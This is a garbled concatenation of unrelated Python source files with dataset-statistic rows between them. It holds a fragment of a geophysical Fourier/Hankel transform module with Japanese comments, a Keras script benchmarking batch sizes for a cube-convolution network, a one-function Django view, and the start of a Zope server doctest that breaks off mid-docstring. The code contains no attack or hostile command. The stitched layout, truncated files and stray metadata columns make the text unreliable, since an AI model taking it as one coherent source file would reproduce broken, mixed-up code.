ans["h_z"] = -np.dot(wt1_time.T, np.imag(h_z_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
return ans
@staticmethod
def fast_fourier_transform(model, f, time, time_diff):
"""
フーリエ正弦・余弦変換による周波数→時間領域への変換。
(ただし、三次spline補間により計算時間を高速化)
f : -
spline補間により得られた周波数領域における電磁応答の多項式近似
"""
base, cos, sin = filters.load_fft_filter(
'anderson_sin_cos_filter_787')
if not time_diff:
omega_base = base / time
f = f(omega_base)
f_imag = -2 / np.pi * np.imag(f) / omega_base
ans = np.dot(f_imag, cos.T) / time
else:
omega_base = base / time
f = f(omega_base)
f_imag = 2 / np.pi * np.imag(f)
ans = np.dot(f_imag, sin.T) / time
return ans
# TODO DLAG !コードに無駄が多いので要修正 修正完了まで非推奨とする
@staticmethod
def dlagf0em(model, nb, emfield):
abscis = 0.7866057737580476e0
e = 1.10517091807564762e0
er = .904837418035959573e0
nofun = 0
base, cos, sin = filters.load_fft_filter(
'anderson_sin_cos_filter_787')
ffl = len(base)
bmax = model.src.freqtime[-1]
tol = 1e-12
ntol = 1
key = np.zeros(ffl)
dwork = np.zeros(ffl)
dans = np.zeros(nb)
arg = np.zeros(nb)
if (nb < 1 or bmax <= 0.0e0):
raise Exception('TimeRangeError: End of time is too early.')
y = bmax * er ** (np.fix(nb) - 1)
if (y <= 0.0e0):
raise Exception('TimeRangeError: End of time is too early.')
i = ffl + 1
nb1 = np.fix(nb) + 1
y1 = abscis / bmax
lag = -1
for ilag in range(1, nb+1):
lag += 1
istore = np.int(nb1 - ilag)
if lag > 0:
y1 *= e
arg[istore-1] = abscis / y1
none = 0
itol = np.fix(ntol)
dsum = 0.0e0
cmax = 0.0e0
y = y1
m = 20
i = 426
y *= e
look = i + lag
iq = look / (ffl + 1)
ir = look % (ffl + 1)
if (ir == 0):
ir = 1
iroll = iq * ffl
if (key[ir-1] <= iroll):
key[ir-1] = iroll + ir
g = y
hankel_result = model.src.hankel_transform(model, g)
dwork[ir-1] = np.imag(hankel_result[emfield]) / g
nofun = np.fix(np.fix(nofun) + 1)
c = dwork[ir-1] * cos[i-1]
dsum = dsum + c
goon = 1
while (m != 0):
while (goon == 1):
if (m == 20):
cmax = np.max([abs(c), cmax])
i = i + 1
y = y * e
if (i <= 461):
break
if (cmax == 0.0e0):
none = 1
cmax = tol * cmax
m = 30
break
if (m == 30):
if (~(abs(c) <= cmax)):
itol = np.fix(ntol)
i = i + 1
y = y * e
if (i <= ffl):
break
itol = itol - 1
goon1 = 1
while (itol > 0 and i < ffl):
i = i + 1
y = y * e
if (i <= ffl):
goon1 = 0
break
itol = itol - 1
if (goon1 == 0):
break
itol = np.fix(ntol)
y = y1
m = 60
i = 425
break
if (m == 60):
if (~(abs(c) <= cmax and none == 0)): # ???
itol = np.fix(ntol)
i = i - 1
y = y * er
if (i > 0):
break
itol = itol - 1
goon1 = 1
while (itol > 0 and i > 1):
i = i - 1
y = y * er
if (i > 0):
goon1 = 0
break
itol = itol - 1
if (goon1 == 0):
break
goon = 0
m = 0
if (goon!=0):
look = i + ilag
iq = look / (ffl+1)
ir = look % (ffl+1)
if (ir == 0):
ir = 1
iroll = iq * 787
if (key[ir-1] <= iroll):
key[ir-1] = iroll + ir
g = y
hankel_result = model.src.hankel_transform(model, g)
dwork[ir-1] = np.imag(hankel_result[emfield]) / g
nofun = np.fix(np.fix(nofun) + 1)
c = dwork[ir-1] * cos[i-1]
dsum = dsum + c
dans[istore-1] = dsum
continue
return dans, arg
@staticmethod
def dlagf1em(model, nb, emfield):
abscis = 0.7745022656977834e0
e = 1.10517091807564762e0
er = .904837418035959573e0
nofun = 0
base, cos, sin = filters.load_fft_filter(
'anderson_sin_cos_filter_787')
ffl = len(base)
bmax = model.src.freqtime[-1]
tol = 1e-12
ntol = 1
key = np.zeros((ffl))
dwork = np.zeros((ffl))
dans = np.zeros(nb)
arg = np.zeros(nb)
if (nb < 1 or bmax <= 0.0e0):
raise Exception('TimeRangeError: End of time is too early.')
y = bmax * er ** (np.fix(nb) - 1)
if (y <= 0.0e0):
raise Exception('TimeRangeError: End of time is too early.')
ierr = 0
i = ffl + 1
nb1 = np.fix(nb) + 1
y1 = abscis / bmax
lag = -1
for ilag in range (1, nb + 1):
lag += 1
istore = np.int(nb - ilag)
if lag > 0:
y1 *= e
arg[istore-1] = abscis / y1
none = 0
itol = np.fix(ntol)
dsum = 0.0e0
cmax = 0.0e0
y = y1
m = 20
i = 426
y = y * e
look = i + lag
iq = look / (ffl + 1)
ir = look % (ffl + 1)
if (ir == 0):
ir = 1
iroll = iq * ffl
if (key[ir-1] <= iroll):
key[ir-1] = iroll + ir
g = y
hankel_result = model.src.hankel_transform(model, g)
dwork[ir-1] = np.imag(hankel_result[emfield])
nofun = np.fix(np.fix(nofun) + 1)
c = dwork[ir-1] * sin[i-1]
dsum = dsum + c
goon = 1
while (m != 0):
while (goon == 1):
if (m == 20):
cmax = np.max([abs(c), cmax])
i = i + 1
y = y * e
if (i <= 463):
break
if (cmax == 0.0e0):
none = 1
cmax = tol * cmax
m = 30
break
if (m == 30):
if (~(abs(c) <= cmax)):
itol = np.fix(ntol)
i = i + 1
y = y * e
if (i <= 787):
break
itol = itol - 1
goon1 = 1
while (itol > 0 and i < 787):
i = i + 1
y = y * e
if (i <= 787):
goon1 = 0
break
itol = itol - 1
if (goon1 == 0):
break
itol = np.fix(ntol)
y = y1
m = 60
i = 425
break
if (m == 60):
if (~(abs(c) <= cmax and none == 0)):
itol = np.fix(ntol)
i = i - 1
y = y * er
if (i > 0):
break
itol = itol - 1
goon1 = 1
while itol > 0 and i > 1:
i = i - 1
y = y * er
if i > 0:
goon1 = 0
break
itol = itol - 1
if goon1 == 0:
break
goon = 0
m = 0
if goon != 0:
look = i + ilag
iq = look / (ffl + 1)
ir = look % (ffl + 1)
if ir == 0:
ir = 1
iroll = iq * 787
if key[ir-1] <= iroll:
key[ir-1] = iroll + ir
g = y
hankel_result = model.src.hankel_transform(model, g)
dwork[ir-1] = np.imag(hankel_result[emfield])
nofun = np.fix(np.fix(nofun) + 1)
c = dwork[ir-1] * sin[i-1]
dsum = dsum + c
dans[istore-1] = dsum
continue
return dans, arg
| 45.581439
| 88
| 0.446317
| 6,498
| 48,134
| 3.074177
| 0.04109
| 0.053765
| 0.092111
| 0.035543
| 0.903985
| 0.882859
| 0.852974
| 0.827393
| 0.810423
| 0.796706
| 0
| 0.049161
| 0.41935
| 48,134
| 1,055
| 89
| 45.624645
| 0.665498
| 0.024349
| 0
| 0.699674
| 0
| 0
| 0.011967
| 0.001734
| 0
| 0
| 0
| 0.000948
| 0
| 1
| 0.01741
| false
| 0
| 0.002176
| 0
| 0.039173
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
736d5d990f966a7c1a4c1c7399dd9560dc58ed10
| 19,988
|
py
|
Python
|
helpers/batch_size_performance2.py
|
jasonrute/puzzle_cube_code
|
cf0238bc333d55e3637a4a6a4f408d16d4e14418
|
[
"MIT"
] | 2
|
2020-11-12T06:41:44.000Z
|
2022-02-27T13:50:38.000Z
|
helpers/batch_size_performance2.py
|
jasonrute/puzzle_cube_code
|
cf0238bc333d55e3637a4a6a4f408d16d4e14418
|
[
"MIT"
] | null | null | null |
helpers/batch_size_performance2.py
|
jasonrute/puzzle_cube_code
|
cf0238bc333d55e3637a4a6a4f408d16d4e14418
|
[
"MIT"
] | 2
|
2018-05-22T02:40:23.000Z
|
2018-07-28T11:14:41.000Z
|
import numpy as np
neighbors = \
np.array([[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 1, 0, -1, 4, 3,
-1, 12, 9, -1, -1, -1, 47, -1, -1, 50],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 2, 1, 0, 5, 4,
3, 15, 12, 9, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 2, 1, -1, 5,
4, -1, 15, 12, 18, -1, -1, 21, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, 1, 0, -1, 4, 3, -1, 7, 6,
-1, -1, -1, 47, -1, -1, 50, -1, -1, 53],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, 2, 1, 0, 5, 4, 3, 8, 7,
6, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 2, 1, -1, 5, 4, -1, 8,
7, 18, -1, -1, 21, -1, -1, 24, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, 4, 3, -1, 7, 6, -1, -1, -1,
-1, -1, -1, 50, -1, -1, 53, 30, 33, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, 5, 4, 3, 8, 7, 6, -1, -1,
-1, -1, -1, -1, -1, -1, -1, 27, 30, 33],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 5, 4, -1, 8, 7, -1, -1,
-1, 21, -1, -1, 24, -1, -1, -1, 27, 30],
[-1, -1, -1, -1, -1, -1, 1, 0, -1, -1, -1, -1, 12, 9, -1, -1, -1,
47, -1, -1, -1, 13, 10, -1, -1, -1, 46],
[-1, -1, -1, 12, 9, -1, -1, -1, 47, -1, -1, -1, 13, 10, -1, -1, -1,
46, -1, -1, -1, 14, 11, -1, -1, -1, 45],
[-1, -1, -1, 13, 10, -1, -1, -1, 46, -1, -1, -1, 14, 11, -1, -1, -1,
45, -1, -1, -1, -1, -1, -1, 37, 38, -1],
[-1, -1, -1, -1, -1, -1, 2, 1, 0, -1, -1, -1, 15, 12, 9, -1, -1,
-1, -1, -1, -1, 16, 13, 10, -1, -1, -1],
[-1, -1, -1, 15, 12, 9, -1, -1, -1, -1, -1, -1, 16, 13, 10, -1, -1,
-1, -1, -1, -1, 17, 14, 11, -1, -1, -1],
[-1, -1, -1, 16, 13, 10, -1, -1, -1, -1, -1, -1, 17, 14, 11, -1, -1,
-1, -1, -1, -1, -1, -1, -1, 36, 37, 38],
[-1, -1, -1, -1, -1, -1, -1, 2, 1, -1, -1, -1, -1, 15, 12, 18, -1,
-1, -1, -1, -1, -1, 16, 13, 19, -1, -1],
[-1, -1, -1, -1, 15, 12, 18, -1, -1, -1, -1, -1, -1, 16, 13, 19, -1,
-1, -1, -1, -1, -1, 17, 14, 20, -1, -1],
[-1, -1, -1, -1, 16, 13, 19, -1, -1, -1, -1, -1, -1, 17, 14, 20, -1,
-1, -1, -1, -1, -1, -1, -1, -1, 36, 37],
[-1, -1, -1, -1, -1, 2, -1, -1, 5, -1, -1, 15, -1, 18, -1, -1, 21,
-1, -1, -1, 16, -1, 19, -1, -1, 22, -1],
[-1, -1, 15, -1, 18, -1, -1, 21, -1, -1, -1, 16, -1, 19, -1, -1, 22,
-1, -1, -1, 17, -1, 20, -1, -1, 23, -1],
[-1, -1, 16, -1, 19, -1, -1, 22, -1, -1, -1, 17, -1, 20, -1, -1, 23,
-1, -1, -1, -1, -1, -1, 36, -1, -1, 39],
[-1, -1, 2, -1, -1, 5, -1, -1, 8, -1, 18, -1, -1, 21, -1, -1, 24,
-1, -1, 19, -1, -1, 22, -1, -1, 25, -1],
[-1, 18, -1, -1, 21, -1, -1, 24, -1, -1, 19, -1, -1, 22, -1, -1, 25,
-1, -1, 20, -1, -1, 23, -1, -1, 26, -1],
[-1, 19, -1, -1, 22, -1, -1, 25, -1, -1, 20, -1, -1, 23, -1, -1, 26,
-1, -1, -1, 36, -1, -1, 39, -1, -1, 42],
[-1, -1, 5, -1, -1, 8, -1, -1, -1, -1, 21, -1, -1, 24, -1, -1, -1,
27, -1, 22, -1, -1, 25, -1, -1, -1, 28],
[-1, 21, -1, -1, 24, -1, -1, -1, 27, -1, 22, -1, -1, 25, -1, -1, -1,
28, -1, 23, -1, -1, 26, -1, -1, -1, 29],
[-1, 22, -1, -1, 25, -1, -1, -1, 28, -1, 23, -1, -1, 26, -1, -1, -1,
29, -1, -1, 39, -1, -1, 42, -1, -1, -1],
[-1, 8, 7, -1, -1, -1, -1, -1, -1, 24, -1, -1, -1, 27, 30, -1, -1,
-1, 25, -1, -1, -1, 28, 31, -1, -1, -1],
[24, -1, -1, -1, 27, 30, -1, -1, -1, 25, -1, -1, -1, 28, 31, -1, -1,
-1, 26, -1, -1, -1, 29, 32, -1, -1, -1],
[25, -1, -1, -1, 28, 31, -1, -1, -1, 26, -1, -1, -1, 29, 32, -1, -1,
-1, -1, 42, 43, -1, -1, -1, -1, -1, -1],
[ 8, 7, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, 27, 30, 33, -1, -1,
-1, -1, -1, -1, 28, 31, 34, -1, -1, -1],
[-1, -1, -1, 27, 30, 33, -1, -1, -1, -1, -1, -1, 28, 31, 34, -1, -1,
-1, -1, -1, -1, 29, 32, 35, -1, -1, -1],
[-1, -1, -1, 28, 31, 34, -1, -1, -1, -1, -1, -1, 29, 32, 35, -1, -1,
-1, 42, 43, 44, -1, -1, -1, -1, -1, -1],
[ 7, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, 53, 30, 33, -1, -1, -1,
-1, -1, -1, 52, 31, 34, -1, -1, -1, -1],
[-1, -1, 53, 30, 33, -1, -1, -1, -1, -1, -1, 52, 31, 34, -1, -1, -1,
-1, -1, -1, 51, 32, 35, -1, -1, -1, -1],
[-1, -1, 52, 31, 34, -1, -1, -1, -1, -1, -1, 51, 32, 35, -1, -1, -1,
-1, 43, 44, -1, -1, -1, -1, -1, -1, -1],
[-1, 17, 14, 20, -1, -1, 23, -1, -1, -1, -1, -1, -1, 36, 37, -1, 39,
40, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[17, 14, 11, -1, -1, -1, -1, -1, -1, -1, -1, -1, 36, 37, 38, 39, 40,
41, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[14, 11, -1, -1, -1, 45, -1, -1, 48, -1, -1, -1, 37, 38, -1, 40, 41,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[20, -1, -1, 23, -1, -1, 26, -1, -1, -1, 36, 37, -1, 39, 40, -1, 42,
43, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, 36, 37, 38, 39, 40, 41, 42, 43,
44, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[-1, -1, 45, -1, -1, 48, -1, -1, 51, 37, 38, -1, 40, 41, -1, 43, 44,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[23, -1, -1, 26, -1, -1, -1, 29, 32, -1, 39, 40, -1, 42, 43, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, 29, 32, 35, 39, 40, 41, 42, 43, 44, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[-1, -1, 48, -1, -1, 51, 32, 35, -1, 40, 41, -1, 43, 44, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[10, -1, -1, -1, 46, -1, -1, 49, -1, 11, -1, -1, -1, 45, -1, -1, 48,
-1, -1, -1, -1, 38, -1, -1, 41, -1, -1],
[ 9, -1, -1, -1, 47, -1, -1, 50, -1, 10, -1, -1, -1, 46, -1, -1, 49,
-1, 11, -1, -1, -1, 45, -1, -1, 48, -1],
[-1, -1, -1, 0, -1, -1, 3, -1, -1, 9, -1, -1, -1, 47, -1, -1, 50,
-1, 10, -1, -1, -1, 46, -1, -1, 49, -1],
[-1, 46, -1, -1, 49, -1, -1, 52, -1, -1, 45, -1, -1, 48, -1, -1, 51,
-1, 38, -1, -1, 41, -1, -1, 44, -1, -1],
[-1, 47, -1, -1, 50, -1, -1, 53, -1, -1, 46, -1, -1, 49, -1, -1, 52,
-1, -1, 45, -1, -1, 48, -1, -1, 51, -1],
[ 0, -1, -1, 3, -1, -1, 6, -1, -1, -1, 47, -1, -1, 50, -1, -1, 53,
-1, -1, 46, -1, -1, 49, -1, -1, 52, -1],
[-1, 49, -1, -1, 52, -1, 34, -1, -1, -1, 48, -1, -1, 51, -1, 35, -1,
-1, 41, -1, -1, 44, -1, -1, -1, -1, -1],
[-1, 50, -1, -1, 53, -1, 33, -1, -1, -1, 49, -1, -1, 52, -1, 34, -1,
-1, -1, 48, -1, -1, 51, -1, 35, -1, -1],
[ 3, -1, -1, 6, -1, -1, -1, -1, -1, -1, 50, -1, -1, 53, -1, 33, -1,
-1, -1, 49, -1, -1, 52, -1, 34, -1, -1]])
def starting_model3d():
"""
Build and return a new neural network using the current model architecture
"""
import numpy as np
from keras.models import Model
from keras.layers import Conv2D, Input, BatchNormalization, Dense, Flatten, Activation, add, Lambda, Reshape
from keras.optimizers import Adam
from keras.losses import categorical_crossentropy
from keras.regularizers import l2
import keras.backend as K
import tensorflow as tf
neighbors[neighbors == -1] = 54
def special_cube_conv(in_tensor, filter_size):
"""
Takes in a None (samples) x 54 x ? (filters) tensor.
It embedds it into 5 x 5 grid, and does a 3D convolution
using only the nodes in the orginal embedding.
To speed things up, it actually does the folowing:
- pads the end with a zero (in the last dimension):
None (samples) x 55 x ? (filters) (neighbors)
- align neighbors to get an output of dim:
None (samples) x 54 x 27 x ? (filters) (neighbors)
- 2d convolution with filter (1, 27) and no padding to get an output of dim:
None (samples) x 54 x filter_size
- reshape to remove last dimension:
None (samples) x filter_size x 54
"""
# pad (output dim: None x 55 x ?)
padded = Lambda(lambda x: K.temporal_padding(x, (0, 1)))(in_tensor) # just pad end
# align neighbors (output dim: None x 54 x 27 x ?)
#aligned = K.gather(padded, neighbors)
#aligned = padded[ neighbors[np.newaxis].astype(np.int32), :]
aligned = Lambda(lambda x: tf.gather(x, neighbors, axis=1))(padded)
# 2D convolution in one axis (output dim: None x 54 x 1 x filter_size)
conv = Conv2D(filter_size, kernel_size=(1, 27),
strides=(1, 1),
padding='valid',
data_format="channels_last",
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(aligned)
# reshape (output dim: None x 54 x filter_size)
out_tensor = Lambda(lambda x: K.squeeze(x, axis=2))(conv)
return out_tensor
def conv_block(in_tensor, filter_size):
conv = special_cube_conv(in_tensor, filter_size)
batch = BatchNormalization(axis=1)(conv)
relu = Activation('relu')(batch)
return relu
def residual_block(in_tensor, filter_size):
conv1 = special_cube_conv(in_tensor, filter_size)
batch1 = BatchNormalization(axis=1)(conv1)
relu1 = Activation('relu')(batch1)
conv2 = special_cube_conv(relu1, filter_size)
batch2 = BatchNormalization(axis=1)(conv2)
combine = add([batch2, in_tensor])
relu = Activation('relu')(combine)
return relu
def policy_block(in_tensor, filter_size, hidden_size):
conv = conv_block(in_tensor, filter_size=filter_size)
flat = Flatten()(conv)
hidden = Dense(hidden_size, activation='relu',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(flat)
output = Dense(12, activation='softmax',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001),
name='policy_output')(hidden)
return output
def value_block(in_tensor, filter_size, hidden_size):
conv = conv_block(in_tensor, filter_size=filter_size)
flat = Flatten()(conv)
hidden = Dense(hidden_size, activation='relu',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(flat)
output = Dense(1, activation='sigmoid',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001),
name='value_output')(hidden)
return output
# the network
state_input = Input(shape=(54, 6), name='state_input')
# convolutional
block = conv_block(state_input, filter_size=64)
# multiple residuals
block = residual_block(block, filter_size=64)
block = residual_block(block, filter_size=64)
block = residual_block(block, filter_size=64)
block = residual_block(block, filter_size=64)
# policy head
policy_output = policy_block(block, filter_size=64, hidden_size=64)
# value head
value_output = value_block(block, filter_size=64, hidden_size=64)
# combine
model = Model(inputs=state_input, outputs=[policy_output, value_output])
model.compile(loss={'policy_output': categorical_crossentropy,
'value_output': 'mse'},
loss_weights={'policy_output': 1., 'value_output': 1.},
optimizer=Adam(lr=.001))
return model
def starting_model2d():
"""
Build and return a new neural network using the current model architecture
"""
import numpy as np
from keras.models import Model
from keras.layers import Conv2D, Input, BatchNormalization, Dense, Flatten, Activation, add, Lambda, Reshape
from keras.optimizers import Adam
from keras.losses import categorical_crossentropy
from keras.regularizers import l2
import keras.backend as K
import tensorflow as tf
neighbors[neighbors == -1] = 54
def special_cube_conv(in_tensor, filter_size):
"""
Takes in a None (samples) x 54 x ? (filters) tensor.
It embedds it into 5 x 5 grid, and does a 3D convolution
using only the nodes in the orginal embedding.
To speed things up, it actually does the folowing:
- pads the end with a zero (in the last dimension):
None (samples) x 55 x ? (filters) (neighbors)
- align neighbors to get an output of dim:
None (samples) x 54 x 27 x ? (filters) (neighbors)
- 2d convolution with filter (1, 27) and no padding to get an output of dim:
None (samples) x 54 x filter_size
- reshape to remove last dimension:
None (samples) x filter_size x 54
"""
print("in ", in_tensor.shape)
# pad (output dim: None x 55 x ?)
padded = Lambda(lambda x: K.temporal_padding(x, (0, 1)))(in_tensor) # just pad end
print("padded", padded.shape)
# align neighbors (output dim: None x 54 x 27 x ?)
#aligned = K.gather(padded, neighbors)
#aligned = padded[ neighbors[np.newaxis].astype(np.int32), :]
aligned = Lambda(lambda x: tf.gather(x, neighbors, axis=1))(padded)
print("align ", aligned.shape)
# 2D convolution in one axis (output dim: None x 54 x 1 x filter_size)
conv = Conv2D(filter_size, kernel_size=(1, 27),
strides=(1, 1),
padding='valid',
data_format="channels_last",
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(aligned)
print("conv ", conv.shape)
# reshape (output dim: None x 54 x filter_size)
out_tensor = Lambda(lambda x: K.squeeze(x, axis=2))(conv)
return out_tensor
def conv_block(in_tensor, filter_size):
conv = special_cube_conv(in_tensor, filter_size)
batch = BatchNormalization(axis=1)(conv)
relu = Activation('relu')(batch)
return relu
def residual_block(in_tensor, filter_size):
conv1 = special_cube_conv(in_tensor, filter_size)
batch1 = BatchNormalization(axis=1)(conv1)
relu1 = Activation('relu')(batch1)
conv2 = special_cube_conv(relu1, filter_size)
batch2 = BatchNormalization(axis=1)(conv2)
combine = add([batch2, in_tensor])
relu = Activation('relu')(combine)
return relu
def policy_block(in_tensor, filter_size, hidden_size):
conv = conv_block(block, filter_size=32)
flat = Flatten()(conv)
hidden = Dense(hidden_size, activation='relu',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(flat)
output = Dense(12, activation='softmax',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001),
name='policy_output')(hidden)
return output
def value_block(in_tensor, filter_size, hidden_size):
conv = conv_block(block, filter_size=32)
flat = Flatten()(conv)
hidden = Dense(hidden_size, activation='relu',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(flat)
output = Dense(1, activation='sigmoid',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001),
name='value_output')(hidden)
return output
# the network
state_input = Input(shape=(54, 6), name='state_input')
# convolutional
block = conv_block(state_input, filter_size=32)
# 2 residuals
block = residual_block(block, filter_size=32)
block = residual_block(block, filter_size=32)
# policy head
policy_output = policy_block(block, filter_size=32, hidden_size=32)
# value head
value_output = value_block(block, filter_size=32, hidden_size=32)
# combine
model = Model(inputs=state_input, outputs=[policy_output, value_output])
model.compile(loss={'policy_output': categorical_crossentropy,
'value_output': 'mse'},
loss_weights={'policy_output': 1., 'value_output': 1.},
optimizer=Adam(lr=.001))
return model
import threading
import queue
class Task:
def __init__(self):
self.lock = threading.Condition()
self.input = None
self.output = None
class BatchProcessHelper:
def __init__(self):
self.lock = threading.RLock()
self._batch_size = 5
def get_batch_size(self):
with self.lock:
return self._batch_size
def decrement_batch_size(self):
with self.lock:
self._batch_size -= 1
def set_batch_size(self, batch_size):
with self.lock:
self._batch_size = batch_size
input_queue = queue.Queue()
def get_value(input_value):
task = Task()
# put the value on the queue to be processed
task.input = input_value
with task.lock:
input_queue.put(task) # put task on queue to be processed
task.lock.wait() # wait until task is processed
return task.output # return output
def batch_process(get_output, batch_process_helper):
import numpy as np
task_list = []
while True:
# retrieve items from the queue
task = input_queue.get()
task_list.append(task)
if len(task_list) >= batch_process_helper.get_batch_size():
array = np.array([task.input.squeeze(axis=0) for task in task_list])
policies, values = get_output([array, 0])
for p, v, task in zip(policies, values, task_list):
with task.lock:
task.output = [p, v]
task.lock.notify() # mark as being complete
task_list = []
if __name__ == '__main__':
import time
from keras import backend as K
model = starting_model3d()
get_output = K.function([model.input, K.learning_phase()], [model.output[0], model.output[1]])
batch_process_helper = BatchProcessHelper()
worker = threading.Thread(target=batch_process, args=(get_output, batch_process_helper,))
worker.daemon = True
worker.start()
# just use random data
inputs = np.random.choice(2, size=(2**10, 54, 6), p=[48/54, 6/54]).astype(bool)
for i in range(11):
batch_size = 2**i
print()
print("batch size:", 2**i)
my_inputs = inputs.copy().reshape((-1, batch_size, 54, 6))
t1 = time.time()
for batch in my_inputs:
get_output([batch, 0])
print("get_output ", "time:", time.time() - t1)
t1 = time.time()
for batch in my_inputs:
model.predict(batch)
print("predict ", "time:", time.time() - t1)
t1 = time.time()
for batch in my_inputs:
model.predict(batch, batch_size=2**i)
print("predict(batch_size=)", "time:", time.time() - t1)
my_inputs = inputs.copy().reshape((-1, 1, 54, 6))
batch_process_helper.set_batch_size(batch_size)
t1 = time.time()
threads = []
for batch in my_inputs:
t = threading.Thread(target=get_value, args=(batch, ))
threads.append(t)
t.start()
for t in threads:
t.join()
print("get_value ", "time:", time.time() - t1)
| 42.800857
| 112
| 0.480989
| 3,089
| 19,988
| 3.026222
| 0.085788
| 0.153188
| 0.150513
| 0.143774
| 0.846277
| 0.830445
| 0.80659
| 0.793325
| 0.782306
| 0.747112
| 0
| 0.160243
| 0.324995
| 19,988
| 466
| 113
| 42.892704
| 0.532612
| 0.115019
| 0
| 0.467066
| 0
| 0
| 0.02442
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056886
| false
| 0
| 0.065868
| 0
| 0.170659
| 0.02994
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
73d943a5e3f0c4d90fb711cc7e693ecd49e903b0
| 160
|
py
|
Python
|
EjercicioDjango0/django0peliculas/views.py
|
carlos3xc/AII-Exercises
|
c88d5b6f65b4774a9a4ae30d8a85e15537540c9d
|
[
"MIT"
] | null | null | null |
EjercicioDjango0/django0peliculas/views.py
|
carlos3xc/AII-Exercises
|
c88d5b6f65b4774a9a4ae30d8a85e15537540c9d
|
[
"MIT"
] | null | null | null |
EjercicioDjango0/django0peliculas/views.py
|
carlos3xc/AII-Exercises
|
c88d5b6f65b4774a9a4ae30d8a85e15537540c9d
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
def index(request):
return HttpResponse("Página principal del EjercicioDjango0.")
| 26.666667
| 65
| 0.8125
| 19
| 160
| 6.842105
| 0.789474
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007143
| 0.125
| 160
| 5
| 66
| 32
| 0.921429
| 0
| 0
| 0
| 0
| 0
| 0.2375
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
73fbf91d6c2ab3e17ea33140f30bcd64e858f4a0
| 3,162
|
py
|
Python
|
src/zope/app/server/tests/test_server.py
|
zopefoundation/zope.app.server
|
e0734fdc7327a1b41542b664eb745fa4299c2a57
|
[
"ZPL-2.1"
] | null | null | null |
src/zope/app/server/tests/test_server.py
|
zopefoundation/zope.app.server
|
e0734fdc7327a1b41542b664eb745fa4299c2a57
|
[
"ZPL-2.1"
] | 6
|
2017-10-30T14:56:41.000Z
|
2020-11-11T14:08:19.000Z
|
src/zope/app/server/tests/test_server.py
|
zopefoundation/zope.app.server
|
e0734fdc7327a1b41542b664eb745fa4299c2a57
|
[
"ZPL-2.1"
] | 1
|
2015-04-03T08:06:09.000Z
|
2015-04-03T08:06:09.000Z
|
##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Tests for zope.app.server.server
"""
import doctest
from zope.component import provideUtility
from zope.app.testing import setup
def doctest_ServerFactory():
r"""Tests for ServerFactory
Zope 3 has many server types -- HTTP, FTP, HTTP with postmortem debugging,
etc. All of them are registered as IServerType utilities in ZCML.
>>> setup.placelessSetUp()
>>> from zope.interface import implementer
>>> from zope.app.server.servertype import IServerType
>>> @implementer(IServerType)
... class MyServerType:
